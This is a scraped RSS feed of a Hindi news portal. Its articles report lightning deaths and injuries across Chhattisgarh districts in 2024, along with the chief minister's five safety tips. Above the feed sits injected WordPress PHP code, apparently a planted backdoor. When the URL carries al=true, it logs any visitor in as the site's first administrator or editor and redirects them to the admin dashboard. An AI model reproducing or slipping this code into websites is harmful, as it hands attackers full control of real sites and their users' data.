// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); sky lightning – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 23 Sep 2024 14:25:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 छत्तीसगढ़-जांजगीर चांपा में गिरी आकाशीय बिजली, बच्चे की मौत और आठ लोग घायल https://pratyushaashakinayikiran.com/?p=73906 Mon, 23 Sep 2024 14:25:00 +0000 https://pratyushaashakinayikiran.com/?p=73906 जांजगीर चांपा.

जांजगीर चांपा जिले के ग्राम सुकाली में आकाशीय बिजली की चपेट में आने से नौ युवक घायल हुए हैं। जिसमे एक नाबालिग बालक की मौत हुई है। घायलों का जिला अस्पताल में उपचार जारी है। घटना सिटी कोतवाली थाना क्षेत्र की है। मिली जानकारी के मुताबिक दोपहर करीबन 3 बजे सुकली गांव के 20 से 22 युवक और बच्चे गांव के तलाब के पास पिकनिक मना रहे थे।

इस दौरान तेज आंधी तूफान और पानी गिरने के साथ आकाशीय बिजली की चपेट गिरने लगी। जिससे बचने के लिए तलाब के पास आम के पेड़ के नीचे खड़े हुए थे इस बीच तेज आकाशीय बिजली गिरने से 7 युवक 2 बच्चे घायल हो गए। उपचार के लिए जिला अस्पताल जांजगीर में भर्ती कराया गया जिसमे एक चंद्रहास दर्वेश 11 साल को डॉक्टर ने मृत घोषित किया है वहीं आठ घायलों का उपचार जारी है जिसमे सभी की हालत सामान्य है। जिला अस्पताल चौकी में मर्ग कायम कर शव को पोस्टमार्टम के लिए मर्चुरी में रखा गया है सोमवार को पोस्टमार्टम कराकर परिजनों को शव सौंपा जाएगा।

]]>
छत्तीसगढ़-सुकमा में गाज गिरने से 12 मवेशियों की मौत, बारिश के बीच मालिकों ने छोड़ दिए थे जानवर https://pratyushaashakinayikiran.com/?p=73535 Sun, 22 Sep 2024 13:45:00 +0000 https://pratyushaashakinayikiran.com/?p=73535 सुकमा।

छत्तीसगढ़ के सुकमा जिले में बीती रात से लगातार हो रही बारिश की बीच आज सुबह गाज की चपेट में आकर एक दर्जन मवेशियों की मौत हो जाने की जानकारी सामने आ रही है। जिसके बाद मवेशी मालिकों ने जिला प्रशासन से मुआवजे की भी मांग की है। जानकारी के मुताबिक सुकमा जिले के पोलमपल्ली गांव में आज तेज आंधी और बारिश के बीच गाज गिरने की से 12 मवेशियों की मौत हो गई है।

बताया जा रहा है कि पोलमपल्ली में देर रात से लगातार बारिश हो रही थी। इस बीच आज सुबह मवेशी मालिकों के द्वारा मवेशियों को छोड़ दिया गया था जहां गाज गिरने की वजह से 12 मवेशियों की मौत हो गई। मवेशियों की मौत के बाद सभी ग्रामीण मौके पर पहुंचे और मवेशी मालिकों ने प्रशासन से मुआवजे की मांग की है। हालांकि इस मामले में प्रशासन के निर्देश पर राजस्व की टीम मौके पर पहुंची और मुआवजे की प्रक्रिया की गई।

]]>
छत्तीसगढ़ में आकाशीय बिजली गिरने की बड़ी घटनाएं, सीएम विष्णुदेव साय ने पांच प्वॉइंट्स में बताए बचने के उपाय https://pratyushaashakinayikiran.com/?p=68988 Wed, 11 Sep 2024 15:56:00 +0000 https://pratyushaashakinayikiran.com/?p=68988 रायपुर/बलौदाबाजार.

छत्तीसगढ़ में पिछले चार-पांच दिनों से लगातार हल्की मध्यम और बारिश हो रही है। बरसात के साथ ही आकाशीय बिजली गिरने की घटनायें भी सामने आ रही हैं। बीते दिनों बलौदाबाजार जिले के मोहतरा गांव में आकाशीय बिजली की चपेट में आने से सात ग्रामीणों की मौत हो गई थी। इस दुःखद घटना पर मृतकों के परिजनों को आर्थिक सहायता के लिए जिला प्रशासन को निर्देश जारी किये गये थे। जिस पर जिला प्रशासन ने पीड़ित परिवारों को चार-चार लाख रुपए के मान से कुल 28 लाख रुपए दिए हैं।

दूसरी ओर आकाशीय बिजली गिरने से बचाव के लिये प्रदेश के मुखिया विष्णुदेव साय ने पांच उपाय बताये हैं। जिसे अपनाकर व्यक्ति आकाशीय बिजली के प्रकोप से बच सकता है। इस संबंध में सीएम साय ने सोशल मीडिया प्लेटफॉर्म पर ट्वीट कर लिखा कि 'प्रिय प्रदेशवासियों, विगत दिनों प्रदेश के विभिन्न क्षेत्रों में आकाशीय बिजली गिरने से जनहानि की दु:खद घटनाएं सामने आई हैं। बिजली गिरने से बचाव के लिए सावधानी बरतना अत्यंत आवश्यक है। जिला स्तर पर आकाशीय बिजली और वज्रपात से बचाव के लिए स्थानीय भाषा में सुरक्षा उपायों का प्रदर्शन करने और लोगों को जागरूक करने के निर्देश जारी किए गए हैं। नगरीय निकायों, पंचायतों, गैर-सरकारी संगठनों और स्थानीय निकायों को भी विशेष जागरूकता कार्यक्रम आयोजित करने को कहा गया है। बरसात के मौसम में तेज बिजली चमकने या बिजली गिरने की आशंका हो तो अपनी और अपनों की सुरक्षा सुनिश्चित करने के लिए महत्वपूर्ण बचाव और उपायों का पालन करें।'

महत्वपूर्ण बचाव और उपाय ————

0- बादलों की गरज के दौरान सुरक्षित स्थान पर रहें- घर के अंदर रहें और पेड़ों, बिजली के खंभों से दूरी बनाकर रहें।
0- धातु की वस्तुओं से दूरी बनाए रखें- बरसात के समय धातु की चीजों को न छुएं, जैसे कि छाता, छड़, और तार क्योंकि यह बिजली को आकर्षित कर सकते हैं।
0- जलाशयों से दूर रहें- पानी में बिजली की संवेदनशीलता अधिक होती है जिस कारण वह आसानी से पानी में फैल सकती है। इसलिए तालाब, नदी, या स्विमिंग पूल से दूर रहें।
0- इलेक्ट्रॉनिक उपकरणों का उपयोग न करें- बिजली गिरने के दौरान कंप्यूटर, फोन, टीवी, आदि अन्य उपकरणों का उपयोग करने से बचें साथ ही अपने उपकरणों में इंटरनेट को भी बंद रखे।
0- अभ्यस्त सुरक्षा स्थान- यदि आप बाहर हैं और कोई सुरक्षित स्थान नहीं है, तो दोनों एड़ियों को आपस में मिलाकर कर उखडू बैठें और अपने कानों को ढक लें।

]]>
छत्तीसगढ़-बलौदाबाजार में आकाशीय बिजली गिरने से सात लोगों की मौत, पेड़ के नीचे खड़े होने से चपेट में आए https://pratyushaashakinayikiran.com/?p=68056 Mon, 09 Sep 2024 13:56:00 +0000 https://pratyushaashakinayikiran.com/?p=68056 बलौदाबाजार.

छत्तीसगढ़ के बालौदाबाजार जिले में आकाशीय बिजली की चपेट में आकर सात लोगों की मौत हो गई। वहीं, तीन लोग घायल हो गए। बलौदाबाजार जिले के मोहतरा गांव में आकाशीय बिजली की चपेट में आकर सात लोगों की मौत हो गई। वहीं, तीन लोग घायल हो गए। बताया जा रहा है कि सभी खेत में काम कर रहे थे।

इस दौरान बारिश होने लगी, जिसके कारण तालाब किनारे पेड़ के नीचे सभी खड़े हो गए थे। आकाशीय बिजली की चपेट में आकर सात लोगों की मौत हो गई। वहीं, तीन लोग घायल हो गए।
मृतकों के नाम —
1. मुकेश पिता राजन उम्र 20 वर्ष
2. टंकार पिता हेमलाल साहू उम्र 30 वर्ष
3. संतोष पिता महेश साहू उम्र 40 वर्ष
4. थानेश्वर पिता दाउ साहू उम्र 18 वर्ष
5. पोखराज पिता दुखू विश्वकर्मा उम्र 38 साल
6. देव पिता गोपाल दास उम्र 22 वर्ष
7. विजय पिता तिलक साहू उम्र 23 साल
घायलों के नाम —
1. विशंभर पिता थनवार
2. बिट्टू साहू
3. चेतन साहू

]]>
छत्तीसगढ़-कोरबा में खेत में परिवार के तीन लोगों पर गिरी आकाशीय बिजली, एक मौत और दो की हालत गंभीर https://pratyushaashakinayikiran.com/?p=67725 Sun, 08 Sep 2024 15:26:00 +0000 https://pratyushaashakinayikiran.com/?p=67725 कोरबा.

कोरबा जिले में आकाशीय बिजली की चपेट में आने से एक शख्स की मौत हो गई। वहीं, दो लोग गंभीर घायल हो गए, जिन्हें उपचार के लिए अस्पताल में भर्ती कराया गया है। उरगा थाना क्षेत्र अंतर्गत ग्राम पंचायत पचपेड़ी में तीन लोग आकाशीय बिजली की चपेट में आ गए। इस दौरान एक शख्स की मौत हो गई। वहीं, दो लोगों की हालत गंभीर बताई जा रही है। दोनों का अस्पताल में इलाज जारी है।

बताया जा रहा है कि तीनों एक ही परिवार के थे और खेत में काम कर रहे थे। जानकारी के अनुसार, फूल दास (30) और उसकी पत्नी किरण महंत और उसके पिता रामदास तीनों खेत में काम करने गए हुए थे। दोपहर 3:30 बजे लगभग अचानक मौसम का मिजाज बदला और काली घटा छाने लगी। इसके बाद झमाझम बारिश और आकाशीय बिजली शुरू हो गई। आकाशीय बिजली की चपेट में आने से तीनों खेत में ही गिर गए, जहां फूल दास की घटनास्थल पर ही मौत हो गई। वहीं किरण महंत और रामदास गंभीर रूप से घायल हो गया। आसपास कम कर रहे खेत में लोगों की नजर पड़ी जहां दौड़कर मौके पर पहुंचे और तीनों को पहले घर लेकर आए। यहां किरण और रामदास को नजदीकी चापा अस्पताल के लिए रवाना किया गया। इस घटना के बाद गांव में मातम छा गया और परिजनों का रो-रोकर बुरा हाल है। वहीं, इसकी सूचना पुलिस को दी गई।

]]>
छत्तीसगढ़-पेंड्रा में आकाशीय बिजली की चपेट में आए कोरबा के तीन लोग, एक की मौत और दो लोग गंभीर झुलसे https://pratyushaashakinayikiran.com/?p=39544 Sun, 09 Jun 2024 19:55:00 +0000 https://pratyushaashakinayikiran.com/?p=39544 कोरबा/पेंड्रा.

पेंड्रा थाना क्षेत्र के झाबर गांव स्थित बरघाट मवेशी बाजार में शनिवार को एक बड़ा हादसा हो गया। यहां पर अचानक मौसम बदलने के बाद आकाशीय बिजली की चपेट में  तीन लोग आ गए। इससे एक व्यक्ति की मौके पर मौत हो गई। वहीं, दो लोग झुलस गए है, जिन्हें इलाज के लिए जिला अस्पताल में भर्ती कराया गया है। मौके पर पहुंची पेंड्रा पुलिस आगे की जांच कर रही है।

जानकारी के अनुसार, कोरबा जिले के शैला गांव के रहने वाले दलबीर मराबी की मौके पर ही मौत हो गई। वहीं, कोरबा जिले के ही रहने वाले हरीश सिंह शैला और छूहई भाड़ी के रहने वाले मंत्री भी आकाशीय बिजली की चपेट में आने से झुलस गए। जिन्हें आनन-फानन में 112 की मदद से जिला अस्पताल में भर्ती कराया गया। वहीं, मौके पर पहुंची पुलिस ने मृतक के शव को कब्जे में लेकर पोस्टमार्टम के लिए भेज दिया है।

]]>